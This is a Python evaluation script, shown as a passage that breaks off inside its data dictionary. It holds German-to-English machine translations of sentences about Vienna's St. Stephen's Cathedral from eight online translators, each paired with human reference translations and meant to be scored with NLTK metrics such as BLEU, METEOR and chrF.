|
52c83db6a3601f2888110e6bf4f23e95d052313f
|
[
"MIT"
] | null | null | null |
evaluation.py
|
hoelzlmanuel/online-translator-evaluation
|
52c83db6a3601f2888110e6bf4f23e95d052313f
|
[
"MIT"
] | null | null | null |
from nltk.translate.bleu_score import corpus_bleu
from nltk.translate.nist_score import corpus_nist
from nltk.translate.meteor_score import meteor_score
from nltk.translate.gleu_score import corpus_gleu
import re
from nltk.translate.ribes_score import corpus_ribes
from nltk.translate.chrf_score import corpus_chrf
from pyter import ter
from copy import deepcopy
translations = {
"Amazon Translate":
[
{
"translation": "St. Stephen's Cathedral (originally cathedral and metropolitan church of St. Stephen and all Saints) on Vienna's Stephansplatz (district of Inner City) has been a cathedral since 1365 (seat of a cathedral chapter), since 1469/1479 cathedral (bishop's seat) and since 1723 Metropolitan Church of the Archbishop of Vienna",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic cathedral, also known as Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes referred to as the Austrian national sanctuary",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "Its name is Saint Stephen, who is considered the first Christian martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second patrol is All Saints' Day",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The building is 107 metres long and 34 metres wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late Romanesque predecessor building from 1230/40 to 1263 are still preserved and form the west facade, flanked by the two pagan towers, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "St. Stephen's Cathedral has four towers: the highest at 136.4 metres is the south tower, the north tower was not completed and is only 68 metres high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In former Austria-Hungary, no church could be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Immaculate Conception Cathedral in Linz was built two meters lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four meters deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "In the south tower there are a total of 13 bells, eleven of which form the main chime of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third largest free-swinging church bell in Europe, has been located in the north tower under a tower hood from the Renaissance period since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"DeepL":
[
{
"translation": "St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and All Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church (seat of a cathedral chapter) since 1365, a cathedral (bishop's seat) since 1469/1479 and a metropolitan church of the Archbishop of Vienna since 1723",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic cathedral, also called Steffl by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "It is named after St. Stephen, the first Christian martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second patron saint is All Saints",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The building is 107 metres long and 34 metres wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late Romanesque predecessor building from 1230/40 to 1263 are still preserved and form the west façade, flanked by the two pagan towers, which are about 65 metres high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "In total, St. Stephen's Cathedral has four towers: the highest, at 136.4 metres, is the south tower; the north tower was not completed and is only 68 metres high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In the former Austro-Hungarian Empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Cathedral of the Assumption in Linz was built two metres lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "The south tower contains a total of 13 bells, eleven of which form the main peal of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era dome since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"Google Translate":
[
{
"translation": "St. Stephen's Cathedral (actually the cathedral and metropolitan church of St. Stephen and all the saints) on Vienna's Stephansplatz (Inner City district) has been the cathedral church (seat of a cathedral chapter) since 1365, the cathedral since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic cathedral, also known as Steffl for short by the Viennese, is a symbol of Vienna and is sometimes referred to as the Austrian national shrine",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "It is named after St. Stephen, who is considered the first Christian martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second patronage is All Saints' Day",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The structure is 107 meters long and 34 meters wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late Romanesque predecessor building from 1230/40 to 1263 are still preserved and form the west facade, flanked by the two heather towers, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "St. Stephen's Cathedral has a total of four towers: the highest at 136.4 meters is the south tower, the north tower was not completed and is only 68 meters high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In the former Austria-Hungary, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Cathedral of the Conception of Mary in Linz was built two meters lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four meters deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "In the south tower there are a total of 13 bells, eleven of which form the main bell of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third largest free-swinging church bell in Europe, has been located in the north tower under a tower dome from the Renaissance period since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"Microsoft Translator":
[
{
"translation": "St. Stephen's Cathedral (actually cathedral and metropolitan church in St. Stephen and all saints) on Vienna's Stephansplatz (inner city district) has been a cathedral church (seat of a cathedral chapter) since 1365, a cathedral (bishop's seat) since 1723, and the Metropolitan Church of the Archbishop of Vienna since 1723",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic Cathedral, also known by the Viennese as Steffl, is considered a landmark of Vienna and is sometimes referred to as the Austrian national sanctuary",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "The name is given to St. Stephen, who is considered the first Christian martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second patrozinium is All Saints' Day",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The structure is 107 metres long and 34 metres wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late Romanesque predecessor building from 1230/40 to 1263 are still preserved and form the western facade, flanked by the two heath towers, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "In total, St. Stephen's Cathedral has four towers: the highest one at 136.4 metres is the south tower, the north tower has not been completed and is only 68 metres high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In the former Austria-Hungary no church could be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Cathedral of the Nativity of the Virgin Mary in Linz was built two metres lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "In the south tower there are a total of 13 bells, eleven of which form the main bell of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower hood since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"ModernMT":
[
{
"translation": "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) at St. Stephen's Square (district Innere Stadt) has been the cathedral church (seat of a cathedral chapter) since 1365, cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic Cathedral, also called Steffl by the Viennese, is considered a landmark of Vienna and is sometimes referred to as the Austrian National Shrine",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "It is named after St. Stephen, who is considered the first Christian martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second Patrocinium is All Saints",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The building is 107 meters long and 34 meters wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late Romanesque predecessor from 1230/40 to 1263 are still preserved and form the western facade, flanked by the two heath towers, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "The St. Stephen's Cathedral has a total of four towers: the highest with 136.4 meters is the South Tower, the North Tower was not completed and is only 68 meters high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In the former Austria-Hungary, no church was allowed to be built higher than the South Tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Cathedral of the Conception of the Virgin Mary in Linz was built two metres lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The South Tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "In the South Tower there are a total of 13 bells, eleven of which make up the main sound of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third largest freely vibrating church bell in Europe, has been in the North Tower under a Renaissance dome since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"PROMT.One":
[
{
"translation": "The St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and All Saints) at the Viennese St. Stephen's Square (Inner City District) has been a cathedral church (seat of a cathedral chapter) since 1365, cathedral (bishop's seat) since 1469/1479 and metropolitan church of the archbishop since 1723",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic Cathedral, also called Steffl for short by the Viennese, is considered a landmark in Vienna and is sometimes referred to as the Austrian national sanctuary",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "The namesake is Saint Stephen, who is considered the first Christian martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second patrol is All Saints",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The structure is 107 meters long and 34 meters wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late Romanesque predecessor building from 1230/40 to 1263 are still preserved and form the western facade, flanked by the two pagan towers, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "In total, St. Stephen's Cathedral has four towers: The highest tower at 136.4 meters is the south tower, the north tower has not been completed and is only 68 meters high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In former Austria-Hungary no church was allowed to be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Marian Conception Cathedral in Linz was built two metres lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The South Tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four meters deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "In the south tower there are a total of 13 bells, eleven of which form the main vent of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third largest freely ringing church bell in Europe, has been located in the north tower under a tower hood from the Renaissance period since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"SDL Machine Translation Cloud":
[
{
"translation": "St. Stephen's Cathedral (actually the cathedral and metropolitan church of St. Stephan and all Saints) on Vienna's Stephansplatz (inner city district) has been a cathedral church (seat of a cathedral chapter) since 1365, a cathedral (bishop's seat) since 1723 and a metropolitan church of the archbishop of Vienna since",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic cathedral, also known as Steffl for short by the Viennese, is considered Vienna's landmark and is sometimes called the Austrian National Shrine",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "St. Stephen, who is considered the first Christian martyr, is the name of St. Stephen",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second Patrozinium is all Saints",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The building is 107 meters long and 34 meters wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late-Roman predecessor building from 1230/1263 to 1940 have still been preserved and form the west facade, flanked by the two heathen towers, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "St. Stephen's Cathedral has four towers in total: The highest of 136.4 meters is the south tower, the north tower has not been completed and is only 68 meters high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In the former Austria-Hungary, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Mariana conception cathedral in Linz was built two meters lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The South Tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four meters deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "In the south tower there are a total of 13 bells, of which eleven form the main building of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third largest free-swinging church bell in Europe, has been located in the north tower under a tower from the Renaissance period since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"SYSTRAN Translate":
[
{
"translation": "The St. Stephen's Cathedral (actually the cathedral and metropolitan church of St. Stephen and all the saints) at the Stephansplatz in Vienna (Innere Stadt district) has been the cathedral church (seat of a cathedral chapter) since 1365, the cathedral (bishop's seat) since 1469/1479 and the metropolitan church of the archbishop of Vienna since 1723",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic Cathedral, also known as Steffl for short by the Viennese, is regarded as the landmark of Vienna and is sometimes also referred to as the Austrian national sanctuary",
